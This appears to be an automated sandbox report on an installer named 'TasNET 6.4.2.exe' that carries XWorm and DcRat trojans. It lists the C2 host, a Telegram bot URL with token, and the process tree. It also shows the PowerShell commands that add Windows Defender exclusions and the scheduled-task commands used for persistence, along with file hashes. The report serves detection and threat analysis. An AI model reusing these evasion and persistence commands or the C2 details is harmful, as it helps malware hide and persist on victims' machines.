Overview

overview

10

Static

static

3

TasNET 6.4.2.exe

windows7-x64

10

TasNET 6.4.2.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-11-2024 12:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TasNET 6.4.2.exe

  • Size

    11.0MB

  • MD5

    98680a096ea18299b58b5edc02c32fe3

  • SHA1

    16a15c4d9cd2d0b06d5a562652674015984a4069

  • SHA256

    31cadbe69cb9aa413846173101ab221115ca248d2154343fe27ecb2190597134

  • SHA512

    712e55650066520045fff13ad0326d871a7d4bc6c68c7e6ee0174259fa7a357ce93bdafb18cfbb682fbd2c0f1d28cdeed883c5c729238576210715b6f4d17e30

  • SSDEEP

    196608:PpBZ9P7gzj9Pjnt8unJQfPngNQJdVilMG9/bpsBJKtJF1yP3hYjsB:fZlcNCunmf4NUE/tYK1yvU

Score
10/10
dcratxwormdiscoveryexecutioninfostealerpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

why-wheel.gl.at.ply.gg:49900

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

  • telegram

    https://api.telegram.org/bot7921366915:AAEY2hsLmS8SLDWCoThahhj-qRzVY87NnlQ/sendMessage?chat_id=7110244770

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Detect Xworm Payload 2 IoCs
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
    persistence
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 13 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\TasNET 6.4.2.exe
    "C:\Users\Admin\AppData\Local\Temp\TasNET 6.4.2.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Users\Admin\AppData\Roaming\TasNET Service.exe
      "C:\Users\Admin\AppData\Roaming\TasNET Service.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:488
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\TasNET Service.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'TasNET Service.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:932
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1432
      • C:\Users\Admin\AppData\Local\Temp\G87J6557GFNCY9L.exe
        "C:\Users\Admin\AppData\Local\Temp\G87J6557GFNCY9L.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2148
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2316
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\HypercomponentCommon\cemEzm0xYx1.bat" "
            5⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1004
            • C:\HypercomponentCommon\hyperSurrogateagentCrt.exe
              "C:\HypercomponentCommon/hyperSurrogateagentCrt.exe"
              6⤵
              • Modifies WinLogon for persistence
              • Executes dropped EXE
              • Adds Run key to start application
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2888
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1tfhpkhi\1tfhpkhi.cmdline"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1092
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5B69.tmp" "c:\Users\Admin\AppData\Roaming\CSC79DF5490896B4860845ED9159EF1E24.TMP"
                  8⤵
                    PID:2556
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x0mzguz0\x0mzguz0.cmdline"
                  7⤵
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:2604
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BD6.tmp" "c:\Windows\System32\CSC7ECC981844524103993796C0B2F1D7E.TMP"
                    8⤵
                      PID:1508
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\sppsvc.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1704
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\TasNET Service.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2388
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office14\spoolsv.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1516
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\conhost.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2484
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1380
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2232
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2OzDmfDsvs.bat"
                    7⤵
                      PID:2164
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        8⤵
                          PID:632
                        • C:\Windows\system32\PING.EXE
                          ping -n 10 localhost
                          8⤵
                          • System Network Configuration Discovery: Internet Connection Discovery
                          • Runs ping.exe
                          PID:1484
                        • C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe
                          "C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe"
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1996
            • C:\Users\Admin\AppData\Local\Temp\TASNet-6.4.2-win64.exe
              "C:\Users\Admin\AppData\Local\Temp\TASNet-6.4.2-win64.exe"
              2⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2828
            • C:\Windows\system32\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpDD45.tmp.bat""
              2⤵
              • Deletes itself
              • Suspicious use of WriteProcessMemory
              PID:2976
              • C:\Windows\system32\timeout.exe
                timeout 3
                3⤵
                • Delays execution with timeout.exe
                PID:2716
          • C:\Windows\explorer.exe
            "C:\Windows\explorer.exe"
            1⤵
              PID:2992
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:1708
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:3068
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:1700
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "TasNET ServiceT" /sc MINUTE /mo 7 /tr "'C:\HypercomponentCommon\TasNET Service.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:1804
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "TasNET Service" /sc ONLOGON /tr "'C:\HypercomponentCommon\TasNET Service.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:2208
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "TasNET ServiceT" /sc MINUTE /mo 10 /tr "'C:\HypercomponentCommon\TasNET Service.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:3048
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office\Office14\spoolsv.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:1860
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\spoolsv.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:2800
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office\Office14\spoolsv.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:952
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\conhost.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:1864
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:1676
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:288
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:2876
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:2788
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:896
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 14 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:1644
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "hyperSurrogateagentCrt" /sc ONLOGON /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:1336
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 9 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Scheduled Task/Job: Scheduled Task
              PID:2092

            Network

            MITRE ATT&CK Enterprise v15

            Reconnaissance

            Resource Development

            Initial Access

            Execution

            Command and Scripting Interpreter

            1
            T1059

            PowerShell

            1
            T1059.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Persistence

            Boot or Logon Autostart Execution

            2
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Winlogon Helper DLL

            1
            T1547.004

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Privilege Escalation

            Boot or Logon Autostart Execution

            2
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Winlogon Helper DLL

            1
            T1547.004

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Defense Evasion

            Modify Registry

            4
            T1112

            Subvert Trust Controls

            1
            T1553

            Install Root Certificate

            1
            T1553.004

            Credential Access

            Credentials from Password Stores

            1
            T1555

            Credentials from Web Browsers

            1
            T1555.003

            Unsecured Credentials

            1
            T1552

            Credentials In Files

            1
            T1552.001

            Discovery

            Query Registry

            1
            T1012

            Remote System Discovery

            1
            T1018

            System Information Discovery

            1
            T1082

            System Location Discovery

            1
            T1614

            System Language Discovery

            1
            T1614.001

            System Network Configuration Discovery

            1
            T1016

            Internet Connection Discovery

            1
            T1016.001

            Lateral Movement

            Collection

            Data from Local System

            1
            T1005

            Command and Control

            Web Service

            1
            T1102

            Exfiltration

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe
              Filesize

              220B

              MD5

              47085bdd4e3087465355c9bb9bbc6005

              SHA1

              bf0c5b11c20beca45cc9d4298f2a11a16c793a61

              SHA256

              80577e4666fad86273b01f60b8d63c15e4ce37774575ac1e0df7a7c396979752

              SHA512

              e74dd8e9756cab1123410a46609dc91540cc29a8fea93017155746f7bb9b7a41bfd3d7595a62788264bedceb475b2a733cce9b70f37cc4478302d5fc228d7684

              Download Submit

            • C:\HypercomponentCommon\cemEzm0xYx1.bat
              Filesize

              105B

              MD5

              5ee2935a1949f69f67601f7375b3e8a3

              SHA1

              6a3229f18db384e57435bd3308298da56aa8c404

              SHA256

              c24a0d7f53a7aa3437f6b6566d3aaebdb36053b64e72cbd1d3796596fc8e3c06

              SHA512

              9777fcb9ee8a8aa0c770c835c5f30aff6efc5fb16a1819047e13d580d748703ffcb446db110067fb2546a637213cb8f25416d4b621a95a789b8e113d31d3401a

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              Filesize

              342B

              MD5

              beaa42ed76e144a8618092f5e25c7883

              SHA1

              66f9c39b86c173feb114dc44f909eaf045dad32b

              SHA256

              34b2b52f900bd3536543dbd055bb448abd83f0906a88276074c6c57ec9d32eb1

              SHA512

              866d25a3ebb4e6d0d51a3cab7c3b36d5fa461637a2eac0e476ca0949dd6c7cf1cbe6850fc911fbbf977c378b94b779315551cb03dd0d8b0785f18ad0a1a9b481

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\2OzDmfDsvs.bat
              Filesize

              229B

              MD5

              b2bceafc9006a34f8a30e031945e471d

              SHA1

              bdf08103c7de9ad5ba344e6a753f4ea04a0e728f

              SHA256

              5b983bffc96c88b578595c7f70ce9cd03b974e1f594f30ea20a463852abcf4d8

              SHA512

              e66abb9bbf105477b0095983d3f6fdce958f7fc612e722f0f19006606427932c4a6eb03ac27a7a33014781608b3274ccfecf34d0afa5ab7eb72bd0c83011b0da

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\CabDA4A.tmp
              Filesize

              70KB

              MD5

              49aebf8cbd62d92ac215b2923fb1b9f5

              SHA1

              1723be06719828dda65ad804298d0431f6aff976

              SHA256

              b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

              SHA512

              bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\G87J6557GFNCY9L.exe
              Filesize

              2.2MB

              MD5

              05d87a4a162784fd5256f4118aff32af

              SHA1

              484ed03930ed6a60866b6f909b37ef0d852dbefd

              SHA256

              7e3d0dabaded78094abfac40d694eaebf861f3cb865d3835bb053d435e996950

              SHA512

              3d4ce511e9671d8bfa15e93d681fedd972f4fe4c09ac9cfd9653afe83e936654c88ee515a76e7ac80e8f34868802e68c6531fdea0b718029d2196ad1425981fc

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\RES5B69.tmp
              Filesize

              1KB

              MD5

              ca437327b85e14a83ea0c5cfe60d20a7

              SHA1

              6bcb53030874c712d6bbf539dd8bd02445020c5a

              SHA256

              98a73bd3fbe54cee30c37ec622dbced0a762974a31c635a627d573d14a9a24b4

              SHA512

              d752aca68b8bc28d15491ccd433fd06b01384ef147fee221568f3be4ed08e083ecdf6bea74ace90f57a980dceffd7ec149a4e5d3e966f32c40aa5959624085c7

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\RES5BD6.tmp
              Filesize

              1KB

              MD5

              c60e743face02362b9595bd06aa7ce6c

              SHA1

              3bf96fe4a313d554d6bf0e34fc1158a2671ebcde

              SHA256

              fad4b93263aeb6f9e3a915d5d2c89bbe3e3ba175e13b490928d27abb6923ab34

              SHA512

              3ba10ab260c4e875ef2f19a44b00b162c972f0eb1d37266152be47b7f9aa0cbae5e81d4e722261062438cb46885a8909bcf04aedb8eac75a21eee99b9832689d

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\TASNet-6.4.2-win64.exe
              Filesize

              11.1MB

              MD5

              21bd4314ff1dc491b8caac21c5e92d32

              SHA1

              1e47badd5445a66906a5f968e6165611cf3348ca

              SHA256

              907e248770a737cb7692d8d12205e7267ad1e77d241f61bf3762fad1177996e3

              SHA512

              2a31f87d35b66c9d65804010bde61ca145b7d4ff6806bd4ac0ba591a1c7ed1ede134e147d088d800ac1e60756656c3f2774292ae9b00df3f9e989768622180e4

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\TarDA6D.tmp
              Filesize

              181KB

              MD5

              4ea6026cf93ec6338144661bf1202cd1

              SHA1

              a1dec9044f750ad887935a01430bf49322fbdcb7

              SHA256

              8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

              SHA512

              6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\tmpDD45.tmp.bat
              Filesize

              164B

              MD5

              c7ffee750b231d8e88319596c6e49d63

              SHA1

              16666389d63ba93d0ae81bd8c438be44da2cca41

              SHA256

              2ff0e19e73cb51d14a9101a284460b972809aeee94dd30ba48e038c8db9528a7

              SHA512

              4650c9742fd9e3bc9297c0ef377348160880efbb065a673555f9ab0fa58d1ab65a8371291aa1a32e4a0b66b27d143b1d2b43c56089e491ffe32ac114a7f2cb07

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
              Filesize

              7KB

              MD5

              4bda049d58415503f5d8f443be7f951d

              SHA1

              f2dcfcff0a9e773061ba280b31869fe2b7c5e6b1

              SHA256

              101f36f8b83229708c2d9ee0843b2fdab682d69592a14a6211a7b03b85c166b3

              SHA512

              6934d5c9d67356ebf293f7a85aab1a18e1ab8165e8312520553b848bef255fd8695dcd9f942471f377a6cbc88e4d684de0b4e056fe7bac786f9969cfbefa14a7

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
              Filesize

              7KB

              MD5

              8de5ad3f0ed2f5c5347d1de85414558e

              SHA1

              5eff1b2765fc8b8c2e401b078612d03354563f30

              SHA256

              3d7eb5a61bfe1ae77f0218af374dd5956f38032428ddd99f075bd1ca600f3166

              SHA512

              127cb139ac86f8c151a226912cb5d08959ecfaf924842ececfb3b30045f24d111ca89ed9b9f7264373ee7d91cd1c588c984cd9b04b76bace6c76c24570228a13

              Download Submit

            • C:\Users\Admin\AppData\Roaming\TasNET Service.exe
              Filesize

              81KB

              MD5

              3f8a4afb12f13712ee2f75400873c734

              SHA1

              af63280999063b26b74b3f7c4b2458e85bbdeaf5

              SHA256

              5d3b21cf3e15db8c42e8d57da53d00a32b6870fb3b92ac47577666c21abfdf6e

              SHA512

              0b66eec5c816b2af09ec12ae413922d9547833a2bb9bfdf9d2c032f2ead725f35032a80037429c5d5d3c7f2cc83b6ef5c61ef359aab00c1e2e446389d8bb6608

              Download Submit

            • \??\PIPE\srvsvc
              MD5

              d41d8cd98f00b204e9800998ecf8427e

              SHA1

              da39a3ee5e6b4b0d3255bfef95601890afd80709

              SHA256

              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

              SHA512

              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\1tfhpkhi\1tfhpkhi.0.cs
              Filesize

              393B

              MD5

              dff5b10fb5def9f96526f2f8536e43ee

              SHA1

              9e7b53e11d5a20b6e5ab4bb1331a84f40af7be8d

              SHA256

              330376361577eada825e30d19b04e88b757a56acecdac296af019a55c732fea4

              SHA512

              9cc6b6c5792d256b53261d65fb3123867d8dda7fa020a3fd6ac764041a22c8d90989e1fcae50a7b291c8f28f3c58a666165c4d72ce45feaef4ff1b3cace613a4

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\1tfhpkhi\1tfhpkhi.cmdline
              Filesize

              247B

              MD5

              f703a109de36645677c137dffb364707

              SHA1

              8316b3a83c87c18ba4167d59c16babdb7ea3d5c6

              SHA256

              46044761836d03211fa48aa7cdc79d6358e57ed169e8661d98e403db1f89c57b

              SHA512

              18ae5f0cdeb727e727f09da0791ab55e0724620d612b5e57a247d568a795b0a4a759550be7367faabc6627323020ab3f993fb0bedaba69b9a810609512922c54

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\x0mzguz0\x0mzguz0.0.cs
              Filesize

              381B

              MD5

              c221dff58de3c59ad924a000ce5d0a5e

              SHA1

              4db3d76805e9dc45ff9b717c1c4c2f889bfaf6ea

              SHA256

              5d9bb9443c8c94f233e594877035c951f163668b74a02b568a573b2438a622af

              SHA512

              c91921ceac2e5d9dfd2d0cc035285de34e1067d5ddd15a102e805e0a55d2c23528e65cb37ba26e9b0277a02996af198a3cf7e9746f4d0f70c7f9a8df973410cd

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\x0mzguz0\x0mzguz0.cmdline
              Filesize

              235B

              MD5

              7f90979a47305ef405f9f74115f26cf1

              SHA1

              8e40b608b9f11b889c7d2d4955e3908a1bedd7b6

              SHA256

              39fb781a4fd7ac1598f40c111e56572c687d517bd61e5266caf783a67263efe7

              SHA512

              57885861ecdfc7acf5c9be883b58a90fd978924bbf40d253fb128eada0392b65d8dffb98269ca5585fef1c76eadadf5a40f62e7de9cdb867e5f5d6a8a6f67a40

              Download Submit

            • \??\c:\Users\Admin\AppData\Roaming\CSC79DF5490896B4860845ED9159EF1E24.TMP
              Filesize

              1KB

              MD5

              b10290e193d94a5e3c95660f0626a397

              SHA1

              7b9de1fd7a43f6f506e5fc3426836b8c52d0d711

              SHA256

              75c9e1766bfb99754b6a00d37ef93488ab216b5ac48984ed7d9d2076a7056fd2

              SHA512

              6ae4201552a499eaa726416b29230f48d94ac7f40ff038165bf8582626bbefe601ef6c051ad97d9156dc4b9b55fd22081db61bcd013916136340c5f1324e4bb5

              Download Submit

            • \??\c:\Windows\System32\CSC7ECC981844524103993796C0B2F1D7E.TMP
              Filesize

              1KB

              MD5

              b74f131aab310dc6e37b43e729c24199

              SHA1

              bade4cf35d7e80e79880396c1fdd518d9ab78bdf

              SHA256

              5fdff2a34cc18e36619ff327b292a8255286dc102d85074b7fc625ccbdbe1858

              SHA512

